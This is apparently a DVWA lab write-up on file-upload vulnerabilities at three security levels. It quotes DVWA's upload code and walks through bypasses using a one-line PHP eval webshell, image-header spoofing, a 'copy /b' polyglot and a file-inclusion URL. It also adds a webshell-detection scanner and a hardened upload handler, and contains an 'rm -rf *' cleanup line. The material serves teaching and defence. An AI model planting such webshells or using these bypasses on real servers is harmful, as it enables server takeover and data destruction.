Target machine
Lab principles
- File upload is a feature most web applications have, for example uploading attachments, changing an avatar, or sharing images and videos.
- Legitimate files are usually documents, images or videos; the web application stores them on the back end and serves them again when needed.
- If a malicious executable file such as PHP or ASP gets past the web application's checks and is executed, the attacker effectively has a webshell.
- Once an attacker has a webshell, they can read the application's data, delete web files, escalate privileges locally, and go on to take over the whole server or even the internal network.
- SQL injection targets the database service, while file upload vulnerabilities mainly target the web service; in real penetration tests the two are combined to gain deep control of the target.
Commands and references
cd /var/www/dvwa/hackable/uploads
# directory where uploaded files are stored
http://192.168.238.131/dvwa/hackable/uploads/shell.php
# AntSword connection address
<?php @eval($_POST['pass']);?>
# one-line webshell
root@owaspbwa:/var/www/dvwa/hackable/uploads# cat shell.php
# view the contents of the shell file
fgrep -R 'eval($_POST[' /var/www/dvwa
# find files under the DVWA tree that contain the eval($_POST[ keyword
rm -rf *
# delete everything in the current (uploads) directory
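The fgrep line above is the defender's side of this lab: once an uploads directory is writable, you want to know whether anything in it carries PHP code. The following scanner is an added example (not DVWA's own code, and not part of the original write-up) that generalises that one-liner: it walks an upload directory, flags PHP open tags and the usual shell primitives, and separately reports files that parse as a valid image yet also contain code, which is what a header-spoofed one-liner looks like on disk. The directory path and the pattern list are assumptions chosen for illustration.

```php
<?php
// Upload-directory webshell scan. Added example, not DVWA's own code.
// Assumption: $argv[1] is the uploads directory, e.g. /var/www/dvwa/hackable/uploads.

const IMAGE_EXTS = ['jpg', 'jpeg', 'png', 'gif'];

// Patterns that should never appear in a file that is supposed to be an image.
// The list is illustrative; tune it for your own code base.
const SUSPICIOUS = [
    '/<\?php/i',                                               // PHP open tag
    '/<\?=/',                                                  // short echo tag
    '/\b(eval|assert|system|passthru|shell_exec|exec)\s*\(/i', // execution primitives
    '/\$_(POST|GET|REQUEST|COOKIE)\s*\[/',                     // attacker-controlled input
];

// Returns a list of findings for one file; an empty list means nothing suspicious.
function scan_file(string $path): array
{
    $findings = [];
    $data = file_get_contents($path);
    if ($data === false) {
        return ['unreadable'];
    }

    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    $claimsImage = in_array($ext, IMAGE_EXTS, true);

    // Judge the content by its bytes, not by the extension the uploader chose.
    $imageInfo = @getimagesize($path);
    if ($claimsImage && $imageInfo === false) {
        $findings[] = 'image extension but content is not a parseable image';
    }

    foreach (SUSPICIOUS as $regex) {
        if (preg_match($regex, $data, $m) === 1) {
            $findings[] = 'contains ' . $m[0];
        }
    }

    // A file that both parses as an image and contains code is a polyglot:
    // a header check such as getimagesize() alone would have accepted it.
    if ($claimsImage && $imageInfo !== false && count($findings) > 0) {
        $findings[] = 'valid image header with embedded code (polyglot)';
    }
    return $findings;
}

// Recursively scans a directory and returns path => findings for flagged files only.
function scan_dir(string $dir): array
{
    $report = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $entry) {
        if (!$entry->isFile()) {
            continue;
        }
        $findings = scan_file($entry->getPathname());
        if ($findings !== []) {
            $report[$entry->getPathname()] = $findings;
        }
    }
    return $report;
}

// Usage: php scan_uploads.php /var/www/dvwa/hackable/uploads
if (PHP_SAPI === 'cli' && isset($argv[1])) {
    foreach (scan_dir($argv[1]) as $path => $findings) {
        echo $path, PHP_EOL;
        foreach ($findings as $f) {
            echo '  - ', $f, PHP_EOL;
        }
    }
}
```

Run it from cron or after each upload batch and treat any hit in an image directory as an incident, since legitimate JPEG or PNG files have no reason to contain a PHP open tag. Expect the occasional false positive from text files; the point is that the check reads the bytes, so renaming a script to .jpg does not hide it.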
tip1: At the low security level neither the file contents nor the extension is checked; only the file size is limited.
tip2: At the medium security level the MIME type is checked against image/jpeg and the size is limited to under 100 KB.
tip3: At the high security level the file extension is restricted to jpg.
tip4: Changing the file header still allows a connection; changing the file extension does not.
tip5: If you get in and can see the site structure but cannot modify data, it is either a cache issue from the previous step or a lack of permissions.
Code analysis
Low security level source:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    # $_FILES["file"]["name"] - the name of the uploaded file
    # $_FILES["file"]["tmp_name"] - the name of the temporary copy stored on the server
    # basename() returns the filename component of a path

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        # move_uploaded_file() moves the uploaded file to a new location
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>
Medium security level source:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
# Only the following is checked (and $uploaded_type comes from the client-supplied Content-Type, not from the file's bytes):
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
    ( $uploaded_size < 100000 ) )
High security level source:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>

# The high-level check reduces to the extension and size test below (getimagesize() only reads the image header, so it is satisfied by a valid header alone):
if (isset($_POST['Upload']))
{
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_ext  = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)) {
        // upload accepted
    }
}
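Each DVWA level above checks one attribute of the upload: nothing, the client-supplied MIME type, or the extension plus an image header read by getimagesize(). The handler below is an added example of how the same form would be processed safely; it is not DVWA's own code and not part of the original write-up. It assumes the GD and fileinfo extensions are loaded and that the storage directory (here the hypothetical ../private_uploads) is writable by the web server but neither served directly nor allowed to execute scripts. The key difference from the high-level check is that the image is decoded and written back out, so only pixel data reaches the disk.

```php
<?php
// Hardened replacement for the DVWA upload handler.
// Added example, not DVWA's own code. Assumptions: GD and fileinfo are available,
// and $uploadDir is outside the document root (or has PHP execution disabled).

const MAX_UPLOAD_BYTES = 100000;                                  // same limit DVWA uses
const ALLOWED_TYPES    = ['image/jpeg' => 'jpg', 'image/png' => 'png'];

// Validates and stores one uploaded image; returns the server-chosen filename.
function safe_upload(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    if ($file['size'] > MAX_UPLOAD_BYTES) {
        throw new RuntimeException('File too large');
    }

    // Detect the type from the bytes on disk, never from $_FILES['uploaded']['type'],
    // which the client sets (that is what the medium-level check trusts).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!array_key_exists($mime, ALLOWED_TYPES)) {
        throw new RuntimeException('Only JPEG or PNG images are accepted');
    }

    // getimagesize() must agree with finfo. A text file that merely starts with
    // a GIF header is already rejected above, because finfo does not call it JPEG/PNG.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || image_type_to_mime_type($info[2]) !== $mime) {
        throw new RuntimeException('Invalid image data');
    }

    // Decode and re-encode through GD. The output contains only pixel data, so
    // bytes appended after the image (the copy /b trick) or hidden in metadata
    // do not survive into the stored file.
    $img = $mime === 'image/jpeg'
        ? @imagecreatefromjpeg($file['tmp_name'])
        : @imagecreatefrompng($file['tmp_name']);
    if ($img === false) {
        throw new RuntimeException('Could not decode image');
    }

    // Server-chosen random name; the extension follows the detected type,
    // so the client-supplied filename never touches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;

    if ($mime === 'image/png') {
        imagealphablending($img, false);                          // keep transparency
        imagesavealpha($img, true);
        $ok = imagepng($img, $dest);
    } else {
        $ok = imagejpeg($img, $dest, 90);
    }
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('Could not store image');
    }
    chmod($dest, 0644);                                           // readable, never executable
    return $name;
}

if (isset($_POST['Upload'], $_FILES['uploaded'])) {
    try {
        $stored = safe_upload($_FILES['uploaded'], __DIR__ . '/../private_uploads');
        echo '<pre>' . htmlspecialchars($stored) . ' successfully uploaded!</pre>';
    } catch (RuntimeException $e) {
        echo '<pre>Your image was not uploaded: ' . htmlspecialchars($e->getMessage()) . '</pre>';
    }
}
```

Re-encoding is what defeats the header-spoofing and copy /b techniques used against the high level: a file that is a valid image with code appended is accepted by getimagesize() but comes out of GD as a plain image. The random filename removes the attacker's control over the path, and storing outside the web root (or, as defence in depth, disabling PHP in the upload directory with php_admin_flag engine off in the Apache <Directory> block) means that even a file that somehow slips through is served as data, not executed.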
Lab procedure
I. File upload at the low security level
if (isset($_POST['Upload'])) {}
At the low security level a file of any type can be uploaded.
<?php @eval($_POST['pass']);?>
# one-line webshell
II. File upload at the medium security level
$uploaded_type = $_FILES['uploaded']['type'];
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000))
At the medium security level the MIME type is checked against image/jpeg and the size must be under 100 KB.
1. Spoof the check by modifying the file header
2. Combine file inclusion with the file upload vulnerability
<?php @eval($_POST['pass']);?>
III. File upload at the high security level
$uploaded_ext  = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG") && ($uploaded_size < 100000))
At the high security level the file extension is restricted to jpg.
Create the one-line webshell: GIF89 <?php @eval($_POST['pass']);?>
Generate the webshell image locally: copy 1.jpg /b + shell.php shell.jpg
Upload the webshell image
In the File Inclusion module, put the relative path to the image after page=
http://192.168.238.131/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/shell.jpg